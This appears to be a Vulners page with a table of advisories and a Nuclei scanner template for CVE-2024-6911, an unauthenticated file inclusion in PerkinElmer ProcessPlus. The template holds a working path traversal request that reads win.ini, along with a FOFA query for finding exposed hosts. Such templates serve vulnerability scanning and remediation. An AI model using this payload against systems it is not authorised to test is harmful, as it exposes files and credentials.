| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-6911 | 22 Jul 202423:41 | – | circl | |
| CVE-2024-6911 | 22 Jul 202420:44 | – | cve | |
| CVE-2024-6911 Unauthenticated Local File Inclusion | 22 Jul 202420:44 | – | cvelist | |
| CVE-2024-6911 | 22 Jul 202421:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Application URL Parameter) - Active Check | 26 Sep 201700:00 | – | openvas | |
| CVE-2024-6911 | 22 Jul 202421:15 | – | osv | |
| Perten Instruments Process Plus Software 1.11.6507.0 LFI / Hardcoded Credentials | 23 Jul 202400:00 | – | packetstorm | |
| PT-2024-37951 · Perkinelmer · Perkinelmer Processplus | 22 Jul 202400:00 | – | ptsecurity | |
| CVE-2024-6911 | 23 May 202508:01 | – | redhatcve | |
| CVE-2024-6911 Unauthenticated Local File Inclusion | 22 Jul 202420:44 | – | vulnrichment |
id: CVE-2024-6911
info:
name: PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion
author: s4e-io
severity: high
description: |
Files on the Windows system are accessible without authentication to external parties due to a local file inclusion in PerkinElmer ProcessPlus.This issue affects ProcessPlus through 1.11.6507.0.
impact: |
Unauthenticated attackers can exploit LFI to read arbitrary files from the Windows system, potentially exposing sensitive configuration files, credentials, and system information.
remediation: |
Update PerkinElmer ProcessPlus to a version later than 1.11.6507.0 to address the local file inclusion vulnerability.
reference:
- http://seclists.org/fulldisclosure/2024/Jul/13
- https://cyberdanube.com/en/en-multiple-vulnerabilities-in-perten-processplus/
- https://nvd.nist.gov/vuln/detail/CVE-2024-6911
- https://github.com/adminlove520/pocWiki
classification:
cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
cvss-score: 8.7
cve-id: CVE-2024-6911
cwe-id: CWE-552
epss-score: 0.04944
epss-percentile: 0.9109
cpe: cpe:2.3:a:perkinelmer:processplus:1.11.6507:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: perkinelmer
product: processplus
fofa-query: '"Process Plus" && icon_hash="1772087922"'
tags: cve,cve2024,processplus,intrusive,lfi,seclists,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET /ProcessPlus HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>Process Plus - Perten Instruments</title>")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4a0a004730450220087599e26ddf245214ca6ad27b50fc2e9b77f8cbd3a3d99612c0c58593c72fc9022100d83718eedc7a24c898fee96a9b6e027af53ba2fddca98da7446c2274c3b33dc4:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation